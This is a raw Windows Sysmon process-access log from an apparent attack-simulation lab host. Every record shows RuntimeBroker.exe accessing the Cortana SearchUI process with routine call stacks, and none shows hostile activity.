13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
